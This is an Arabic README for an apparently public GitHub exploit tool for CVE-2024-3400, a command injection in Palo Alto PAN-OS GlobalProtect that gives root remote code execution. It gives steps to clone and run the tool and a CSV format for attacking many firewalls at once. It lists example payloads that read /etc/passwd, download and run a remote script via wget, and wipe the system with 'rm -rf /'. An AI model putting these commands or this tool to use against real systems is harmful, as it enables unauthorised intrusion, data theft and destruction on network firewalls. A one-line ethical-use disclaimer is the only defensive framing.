
استغلال سكريبت لثغرة CVE-2024-3400، وهي حقن أوامر في PAN-OS GlobalProtect، مما يسمح بتنفيذ كود عن بُعد غير مصادق عليه بصلاحيات الجذر. يدعم الاستغلال لهدف واحد وأهداف متعددة قائمة على ملفات CSV.
تم تصميم هذا السكربت لتوضيح استغلال الثغرات في جدران حماية PAN-OS. يرسل حمولة مُصممة خصيصًا إلى نقطة نهاية API لجدار الحماية لتنفيذ أوامر عشوائية. يستهدف هذا الاستغلال تحديدًا CVE-2024-3400، وهي ثغرة حقن أوامر في ميزة GlobalProtect في برنامج Palo Alto Networks PAN-OS لإصدارات محددة من PAN-OS. قد تمكّن تكوينات ميزات معينة مهاجمًا غير مصادَق من تنفيذ كود عشوائي بصلاحيات الجذر على جدار الحماية.
ملاحظة: يرجى التأكد من أنك تستخدم هذا السكربت فقط لأغراض قانونية وأخلاقية، وفقط على الأجهزة التي لديك إذن باختبارها.
لاستخدام هذا المشروع، اتبع الخطوات التالية:
git clone https://github.com/Yuvvi01/CVE-2024-3400
cd CVE-2024-3400
pip install -r requirements.txt
python3 exploit.py
اتبع التعليمات لإدخال عنوان IP لجدار حماية PAN-OS القابل للاستغلال والحمولة المراد تنفيذها.
ls -la
cat /etc/passwd
whoami
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
rm -rf /
سيطلب السكربت مسار ملف شهادة SSL من خادم جدار الحماية PAN-OS. إذا لم يتم تقديم مسار، سيضبط السكربت تلقائيًا التحقق من SSL إلى false، مما يعطل SSL فعليًا.
يتيح لك هذا السكربت استغلال أهداف متعددة من جدران حماية PAN-OS القابلة للاستغلال باستخدام ملف CSV. فيما يلي تعليمات تنسيق ملف CSV بشكل صحيح:
يجب أن يحتوي ملف CSV على ثلاثة أعمدة:
ipaddress: عنوان IP لجدار حماية PAN-OS القابل للاستغلال.
payload: الحمولة المراد تنفيذها على جدار الحماية.
path/to/root_CA_certificate.pem: مسار شهادة CA الجذرية (اتركه فارغًا إذا كان التحقق من الشهادة معطلًا).
مثال على ملف CSV:
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,